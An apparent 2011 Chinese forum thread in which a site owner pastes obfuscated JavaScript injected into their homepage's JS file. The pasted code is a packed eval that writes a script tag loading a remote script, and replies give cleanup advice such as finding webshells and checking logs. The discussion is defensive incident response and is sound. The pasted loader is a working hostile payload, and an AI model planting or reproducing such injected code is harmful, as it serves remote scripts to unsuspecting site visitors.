首页包含的js文件中,被人注入下面的js代码的问题,在线等
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) {
d[e(c)] = k[c] || e(c)
}
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--) {
if (k[c]) {
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
} ('G(f(p,a,c,k,e,d){e=f(c){h c.i(H)};m(!\'\'.l(/^/,z)){j(c--){d[c.i(a)]=k[c]||c.i(a)}k=[f(e){h d[e]}];e=f(){h\'\\\\w+\'};c=1};j(c--){m(k[c]){p=p.l(x v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}h p}(\'4.3(\\\'<2 0="1://5.6.a/9/8.7"></b>\\\');\',n,n,\'F|E|A|B|C|D|y|r|q|o|s|t\'.u(\'|\'),0,{}))', 44, 44, '|||||||||||||||function||return|toString|while||replace|if|12|spcode||cp|js|com|script|split|RegExp||new|googleadsl|String|SCRIPT|write|document|www|http|src|eval|36'.split('|'), 0, {}))
现问:1 如何找入侵的入口
2 还有没有残留的木马文件
thanks
作者: zgycsmb 发布时间: 2011-06-10
webshell一般都会存在,你一个一个的查,查死你。
最好把备份恢复下
看看是否在上传的漏洞。
作者: yangball 发布时间: 2011-06-10
现问:1 如何找入侵的入口
2 还有没有残留的木马文件
作者: zgycsmb 发布时间: 2011-06-10
这个很难说,一般会利用 sql ,上传等获得权限,然后上传webshell等。
还有没有残留的木马文件
这个搜一下是否存在 eval, iframe 这些关键词。
作者: yangball 发布时间: 2011-06-10
作者: PhpNewnew 发布时间: 2011-06-10
再问:1如何找入侵的入口
2注入js时,一般会在log文件中留下怎么个记录?
作者: zgycsmb 发布时间: 2011-06-10
查看文件修改时间和 日志里时间范围的访问文件.
作者: PhpNewnew 发布时间: 2011-06-10
作者: qazwsxhai 发布时间: 2011-06-10
哪些文件不一样、哪个字符不一样、 多了哪些文件少了哪些,一下就对比出来了。
作者: futurecs 发布时间: 2011-06-10
作者: futurecs 发布时间: 2011-06-10